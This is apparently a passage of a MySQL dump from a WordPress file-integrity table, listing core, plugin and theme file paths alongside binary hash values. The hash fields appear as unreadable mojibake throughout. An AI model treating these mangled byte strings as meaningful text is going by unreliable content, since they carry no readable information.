�','�)�K���%A�Z&�y�`M��U!�i:A�[�','',0,'?'),('S0�־��K/17u���','wp-includes/js/jquery/ui/selectmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('SX+7�1?���-','wp-includes/js/jcrop/Jcrop.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('Sj�~6��{�����X','wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��gRȺ#c�٩�','���?~�o,cy2�P��on��`����ϻ}u8:H','',0,'?'),('SzW��NKUS��','wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('S���O[N�.�v�e','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('S�C��i1ۭ�j�','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��\\E���(��i','4�O���+o�c.`_����U��>�8��','',0,'?'),('S����p�>��Wr�YE','wp-comments-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.K��OQ ��ga��','LJ��h��`*�dr�}�6-�߁P�Q��{�','',0,'?'),('S�dlz�s�V7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�~МI�XP/��$','�s�em��/�;��֘���� aZ�H`�g3','',0,'?'),('S��t� ��J�9���G','wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IF �1�P�������','��hbAnIJ��\'��o�;~p%�Z$.\'����-4','',0,'?'),('S���\n�pލG%�','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('S��&�az8�Jض9�','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AĢ<ݤ9�fK:','�6��-�Պ��涫9����W\"\'�|w�w~�E\n','',0,'?'),('S�^�7jK5I6K�2!','wp-includes/Requests/Cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��4�G��FdW(�','1��0*�E�3:/��2p��կ�\0K2^�(','',0,'?'),('S��0ӽ\nq����\n�5','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��w\ri�컎vL*x�','�N�b���\r̎�/?+\'��bi\'�W�$@�i\0','',0,'?'),('T�r���~�W]�','wp-includes/class-wp-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J0n�N.��yƪb��','�}�u\0tE\n�&���yt2���B���','',0,'?'),('T\'���*��� �lbj','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/tooltip.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�\' �b���J&t�','�\'��g��jD��(4B~ig���ڇ�2','',0,'?'),('T6K?���s� �7(�','wp-includes/customize/class-wp-customize-sidebar-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('T8�`?z5̨Ѭ���','wp-content/themes/healthcare/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��¹z�`<{qnʛ��','T\"z�\\�Z�a��(�mbtʸ�I�\\����o','',0,'?'),('T:�Dğ.&l�\Z?�&�A','wp-content/plugins/wp-cerber/assets/flags/in.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�weIɻ�j籏��{\n','��4x�\n��<~�z����{��V��Я\"N�','',0,'?'),('T?�?:qP��ah\'��','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AN�X[`h\0����','�\"xI�B6�E?�����i�\'26�5y/��','',0,'?'),('TM����l����','wp-admin/includes/class-wp-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O\'<r,x�ib��$','MqރR�3=E�8C�@^��@ò�~�qv�M���','',0,'?'),('TO_��y��l���h�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/repeater/repeater-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�d�ķ�-���','���\0��*K���E����2��p�~�PG�','',0,'?'),('Tma��>�*\\3�3','wp-content/themes/advance/inc/kirki/assets/js/controls/dropdown-pages.js',0,' �~|�D�Jt�D�\0x�',' �~|�D�Jt�D�\0x�','����@��L��Y{\"�����:NJ�Dq\"[','',0,'?'),('Tw��=��+�6����','wp-includes/js/tinymce/wp-tinymce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����--��T�J�;','��O���w�:�V�^�w�^[\n� L�\'�6@-�\r�','',0,'?'),('T{\'���g,(:~�G','wp-content/themes/twentynineteen/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڈLBP��En�\\^ ��P','�RSV%�6�){��O����x2��N�A���','',0,'?'),('T{��Qmc��7��0\"s','wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�Kwt�G��\'�(�','��mǸ�${���&W�>�.{?�Wo�)�=�H�','',0,'?'),('T�.o@Ψ2�w�v��X�','wp-includes/js/jcrop/jquery.Jcrop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('T���vm?,�a���T4�','wp-includes/ID3/module.audio-video.quicktime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('T��v�(��k�\"','wp-content/themes/advance/archive.php',0,'ٰD��S~��|i5��','ٰD��S~��|i5��','��\"�\"Eɍ��@��1���Ns��b}��dS�Z�','',0,'?'),('T���\r�fV�+� j�','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxX��JT��bx���','f��x�/�x��G�\n8�5�6� Z�+','',0,'?'),('T�/���3֊��W','wp-content/themes/regina-lite/inc/customizer/customizer-active-callbacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���! �Π�;$FG�','\n1��V=��|E��1y�S�(��p}��7�0��','',0,'?'),('T�>��<�_\"g','wp-content/plugins/wp-cerber/assets/flags/nf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2���rJizڜS��','�P�w�.�^}��\Z�ފڝ3q�{���','',0,'?'),('T�.��)m�&����I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�41l#}�p���zk1','��h�� �_��֚����!E��4�\Zv��F��','',0,'?'),('T�+��V�0]�C�','wp-content/themes/healthcare/images/footer-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�e��6I��','�I�\n�Ksq�#���32}�����M��w�g','',0,'?'),('T܌�7`\0���(�','wp-includes/js/mediaelement/renderers/vimeo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('U�\\p{J��O�Q�&','wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('U\"ou?���Δ��','wp-content/themes/weblog/assets/library/html5shiv/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ިUPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('UI�_����Ym���_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�W��P��2oY','�v�����4\'���w��h�<|Z�4Q8�xǃ5','',0,'?'),('Ue�tA&�R|��\rQV','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�1�`�Uy�+�۟��','�4_�����H1h(�p��A�9u���^�f�B','',0,'?'),('Uf��\\%���J7','wp-content/plugins/redirection/models/flusher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��I�Z�ގ|4�W�\'','T�����8�0|�&)�r/�H�\n�}6��~','',0,'?'),('U�.��G\0��h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��Dz��겊��T','s�my(�[�~��M������N�Ԙ��;i','',0,'?'),('U� $A=�He�|�zȖ(','wp-includes/Requests/SSL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��������','�}I^L�\\95�N�Y���;�?z��aE=�','',0,'?'),('U�nɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=&#��Tk��A=�?','�S��� `4� :�0�U�h���p���s�ń','',0,'?'),('U���$g���~��L��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/sections/section-pro.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�ݚ���:hN{�2F~{','\n7��J�v��8J�&�����P���mL;]','',0,'?'),('U���E�9��\n�b','wp-content/themes/doctors/core/assets/images/swipebox/icons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']nU��%Q����h�','��r�Gu�@�wT�*��A�3��v��j�d','',0,'?'),('U�~�UO:c#3#W��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ,� ^��R6Մ��l','�&x{�e5��ɔ�|��c��J��\Z���Ȓ','',0,'?'),('U���$i\"u��&��9','wp-includes/images/crystal/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('U�^�� H�T�7j','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\'���Y�p','�����,�\"w�,��L� Rj\0��)M�o�','',0,'?'),('U�*�%���M�%9mה','wp-content/themes/wp-barrister/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E���8%��&4�^�4','�l�?=��qo�\\�t���E�8\0�a�&�N�','',0,'?'),('U��X>��͠�WW��','wp-content/themes/doctors/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n��Q�3�LP�+','�Ux���Q�>�m�ͷ��\'Cɭ���','',0,'?'),('V\n��U`�_�5���8','wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��r�#��j �','LF�#�53��uu��t�F �չRk*xs_{E','',0,'?'),('V���\Z��_�R��','wp-content/themes/twentynineteen/js/priority-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�~&*mB��T@�GI�','D(�Tu}5{������ \0+��5g7`�)�y�','',0,'?'),('V�\r�3#��J��{','wp-includes/sodium_compat/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��NKp@}���\r�|','���a���<K�-��Ìb=7t�#�-8��/��`','',0,'?'),('V#7A�����@�?���)','wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(`��HMD��A�7�9','y��I~ @V�Y247�&�U��uމ����','',0,'?'),('V2�L��\0ۺ��','wp-includes/js/jquery/ui/controlgroup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('V8~ʛ�o�r�I@','wp-content/themes/skt-toothy/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����r�����A,�','�~G��ʤZK� 4��3pY.�(B�(�&ܭ�@��','',0,'?'),('V8��8��ߟ\rZ�5','wp-content/themes/twentynineteen/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q��n䄼��a�','�4�x\"�#�4�ϙ��w2�E��7�l�4�1�','',0,'?'),('V?�O�N���e�ZF\\�','wp-includes/js/jquery/ui/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('VL6�7G^l%D5z3��','wp-includes/default-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�t��<���!�','�^�\'U9�;dOˊSz��!S��m��>I5�\'�e�','',0,'?'),('Vne!�z0u1?��','wp-includes/shortcodes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'9A�C��zaϥ�2','@o��i\r��������}�8�n���#�\Zق','',0,'?'),('Vrm�KE�p�j��6�','wp-admin/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('V�E��#��5õ�','wp-content/themes/doctors/core/includes/customize-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R:F�\n(�� ��a� p','��9���rl�!v�:�^��w�x(�=��c�|�','',0,'?'),('V�����댏$�x','wp-admin/js/post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~=��z�!L\Z�DAl�','�js�O�v�W��Ϗ�Sq��������','',0,'?'),('V����rz�(�nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�T^z[\"��\Zo��','A����_}��Q�\"�gV�UْP��(���6l','',0,'?'),('V�i��1���\'סԧ','wp-content/themes/healthcare/images/appointment-scheduler-pro.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�z9�]գ�{�*C','�-d\0ixp�ZJ��\n��L9_����e�','',0,'?'),('V��������Q���','wp-content/themes/healthcare/css/font-awesome/less/larger.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�����&&�\Z|�(','iѪ8j0��NK��a\0�n��JtR��P|D�F','',0,'?'),('V׀��\'h��Ĉ+:��','wp-admin/includes/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2n�Ֆ[�uj��7','e�M3V\"�d0����/0o���u�T�k��','',0,'?'),('V�C\n�W���<&od+�','wp-content/plugins/redirection/models/group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�\'��E����B��','+\n�G\0�wӍO/}�uO}�����~�J��<�','',0,'?'),('V���1)�~����O','wp-content/plugins/wp-cerber/assets/wrench.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�3�Cb�C-2!�Q�','�;�����մ��xj�E����%Z�P�c��','',0,'?'),('Ws�$8�~��Nȁ-�@','wp-includes/js/mediaelement/mediaelementplayer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('W&�ִ �)+�ڱ���','wp-admin/includes/class-plugin-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z1)i(o+���:','�z��d ��&,T`6BeW���S�w3\\��','',0,'?'),('W8h�!ɩk�ĉ\'�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�RU�b�*��\0\'�','x����<�s��BZ�2�j��RM\'0%$��i{ V','',0,'?'),('W;1C\\:~��D���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Kۦ��81yR�','){e���`�v�)?/��;wnh�x�r���%�','',0,'?'),('Wl[_��-�콞 �','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�\Z�\n�����N�\r�E','h����n�#�M��p�\0j����E��!�D�','',0,'?'),('Ws��{N�hP�r�㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kӞw��\"���M��','z�v�l������!1L���+\0�.�i��kIj','',0,'?'),('Wx\Z�Ta��7{��','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�|��s,�=�K#�','6���ly�6ɦi��3U���,�E[鲓9��','',0,'?'),('W{�g- X��\'=n8','wp-admin/moderation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�EVU��u�������','��Fq�6��1����<���w�t&�b����1��','',0,'?'),('W})Ӗ7���e�}5�9,','wp-admin/load-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i\r|&�Ĉ3�d!ک9�','{��uo�b��jxa��[S\'K&��S�%\nAi��','',0,'?'),('W��LjN/�@Ϣ�ư�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T ��nr�k���','�;\\��Xځ��/0;��Q�P�.�B4��\Z�','',0,'?'),('W�U��?��tl�/W >','wp-content/themes/twentynineteen/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a2[��6��g���','��{EolP,qh�O������F� ���Df�','',0,'?'),('W��5�Ν�>�_`|��','wp-content/plugins/wp-cerber/assets/flags/py.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����UƸ_��`U��','���s�d��-��ǁ&ǂ��v� &l:��V','',0,'?'),('X ���md�Ӱ_�o','wp-content/themes/healthcare/css/media-query.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�Kc�Hp\Z3V�3','�����\n\r��]�c�����LK�x��','',0,'?'),('X��\\shv]�iB�','wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݇�(�0,m�G_Y�3','^�)o�B������f�g�*�V�P�?�~��u:','',0,'?'),('X+ٴ���3��0�1�','wp-content/themes/twentytwentyone/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5qO\'1�nU�X���4','tnjҴ�%.<A���s��݅�,[��(���.�','',0,'?'),('X,�E�Cj$_��8I��0','wp-includes/images/smilies/icon_cool.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��`����ivj.�','�事F�9;2_ �$�$~�LO�a��6���_','',0,'?'),('X7#����38����','wp-content/themes/doctors/images/demo/bg_2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�\"(ִꅁ\\UO��Q','@�C0�G�e-C�|\r1�~D����|��4}� �','',0,'?'),('XRe]��\\�<&p���G','wp-content/themes/healing-touch/images/footer-heading-border.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Vf�q\r#+�:��#�','���\\�������\Z=_��P|g\r�Rb','',0,'?'),('X�?n�8�*��9��S�','wp-content/themes/healthcare/images/slider/slider2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|Mj�,�*ϚI�\\p�','~֍{z\0�3C��PS��V2�5Yrg\rH�!�Z','',0,'?'),('X�۩�i)�9Y���','wp-content/plugins/redirection/actions/nothing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�l�.�d�a&�A+�','�E|��:� 2��]�iK��ل�M�>�\Z���. �','',0,'?'),('X��M����xڳ�J�','wp-includes/Requests/Hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�� ���gx�i���','�՚���� Q�憐D�P��_?y�`�����','',0,'?'),('X�:8+˓2>V]��8�','wp-admin/images/sort-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Aìk�:�bтvFj','\'���aK�\0tGJ�Bq��XW*(J|1���z[(','',0,'?'),('X���v�\Zƒ��\"�$','wp-includes/Requests/Exception/HTTP/409.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�i�~*=����','���_M��8U���.pF����w�:E`�MB��','',0,'?'),('X�?M-H?���Al8/','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H|��wcC�6�ʕ','��\nA022?�rק.���jJ5�G��rZ','',0,'?'),('X�s��Yq���ePL','wp-includes/blocks/code/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �2z`������A�%�','W��@\r�8�Q��u�\0H� �WhR��ے0c���','',0,'?'),('X���G������z�X','wp-admin/includes/class-wp-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P=�&��\\��.�_I','��fJ��\n\'-�#?�%�7����{�}\\٤�$�','',0,'?'),('X�~�Vzl!_�]/�-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k(ʫ�ݑ伉����\"','�ڴ��\'��(X�����\"��Ocn,Mq`�D�','',0,'?'),('X�k(D��qț��G��','wp-includes/js/jquery/ui/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�U���Ƥ����','��f,p��`��qR��2�\Z^v�6��`��s�$','',0,'?'),('X�=�2h4�/{�+','wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��u�{�t���','��,�Z\rM >܅��g�p�/� Z\Z#`!�.','',0,'?'),('X�TCW_^��og��','wp-admin/includes/class-wp-debug-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�:�UJNJt���ѷ','��_�.C��=�v<^(���6�.�Dه� �','',0,'?'),('Y\n/��0#q�E�','wp-content/themes/healthcare/css/font-awesome/scss/font-awesome.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UY!mTc\n��aƸ=','\'����:;�U��\"k�M�#�I@�+y��_�','',0,'?'),('Y����bڧ,��J','wp-includes/Requests/Exception/HTTP/405.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8т�m!�Ҭ����','j�b�횄��^U�sv8�$b����M�3y�','',0,'?'),('Y&�6��ڳ��6����','wp-content/plugins/wp-cerber/assets/flags/mg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��;��P�IH\\�','�d|�-uc�P�����V����Oh�`��_','',0,'?'),('Y(�K���g\0��_��','wp-includes/js/dist/annotations.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%e���F�\"�8�]','�U��8�E�]�\0{\"�2��Eh��$���*�\'�H','',0,'?'),('Y,Qp�gmu#�e���~','wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8x$�9�hQ&�','n~��B�Ȳ���|�4�[�U�`\0�2�J۷�','',0,'?'),('Y/�ޑ� ���\Z���','wp-includes/js/dist/escape-html.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E����e����c�k�','8:���\Z�U$D_�t���8(f4�}%Uә�','',0,'?'),('YBc��z��^?��f�','wp-content/themes/advance/inc/kirki/assets/js/controls/multicheck.js',0,'���VJ���8�+��','���VJ���8�+��','EDF/8��(��5`1AĶ�&�����P0@N','',0,'?'),('YBt\n�\nc�ݟ.��vi','wp-content/plugins/wordfence/views/diagnostics/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�R�<�)��Yf�8�','�,�Iq0\r8i;[K.�4?t�\\.ZH\Z','',0,'?'),('YV�2��9}D8�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=on~Z���TOQ�Be','�<�H���\"��F�@����%���1`7<�� ��}','',0,'?'),('YdV?+� e��\'�ym{','wp-content/themes/regina-lite/layout/js/preloader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��in�Y��]�,�Y�','�=�ȑ�\0U\"<0����v���`����','',0,'?'),('YhP�ķum֖��','wp-content/themes/vision-lite/css/nivo-slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�c�.��R+��t�','�b ��D���$�\'��mJ:E��CK�3�0H�','',0,'?'),('Yx��ԃ���y�Y\"�','wp-content/themes/healthcare/css/color/blue.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�1�}�\"�^Uv���','�E���Մrp�i�x�E2�EV/d�e�}�l�$Q','',0,'?'),('Y�La���h�(','wp-admin/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oۖ���e�y�V�Bnt','���p�S��p>�5��\r��+El�VI��5V�','',0,'?'),('Y�,�e�A��w�`���','wp-includes/images/media/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('Y�BWy +�B�Om�z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��:��N�\'�Dx��N','�[��_|А�~E����+�~�E�(�`�_��','',0,'?'),('Y�68�H;%,�_c\n�','wp-includes/css/wp-auth-check.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j��b�u��=�`c','�\r[�B�{\'C�N5zZw� pȈ��I�K�e ��','',0,'?'),('Y�J+{�o(�A%f�e�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dܹ<9N1g�%�C���','o�c��̺m�J �\nK�\"�Fו�Kc�E��','',0,'?'),('Y�Ro1Ĩ�cx�+V�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/color-schemes/color-schemes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(|�H��,���v�}','�=�\Z�*6`�G�]~q����FG�K�-(���z','',0,'?'),('Y�cq��Q�5�FC��l ','wp-content/themes/advance/inc/kirki/assets/js/controls/dimension.js',0,'���)�d�\"�.�� 1','���)�d�\"�.�� 1','�;�d�A\' A��@�f�*�P<(�Q�m��y','',0,'?'),('Y�\\}#BZAF镶\Z�n\"','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U1�vU���[�>','+��o��g��Y]WjN:���l�䄓G��/B','',0,'?'),('Y����]���ŞI���','wp-includes/js/jquery/ui/effect-slide.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I^�\Z+:C��)H[','Y��� �%��!���d!F��r`�݀��4','',0,'?'),('Y֝��U����}�r/','wp-includes/SimplePie/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��~ܯ{ʹ���+h�','�md�����n�nun�pU0 